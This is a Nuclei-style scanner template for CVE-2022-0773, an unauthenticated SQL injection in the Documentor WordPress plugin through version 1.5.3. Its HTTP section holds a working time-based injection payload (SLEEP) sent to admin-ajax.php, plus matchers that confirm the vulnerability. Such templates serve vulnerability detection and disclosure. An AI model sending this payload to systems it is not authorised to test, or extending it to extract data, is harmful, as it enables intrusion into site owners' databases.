id: CVE-2022-0773

info:
  name: Documentor <= 1.5.3 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc
    - https://wordpress.org/plugins/documentor-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0773
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
  tags: unauth,cve2022,sqli,wp-plugin,wp,documentor-lite,wpscan,cve,wordpress

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)

      - |
        GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
        condition: and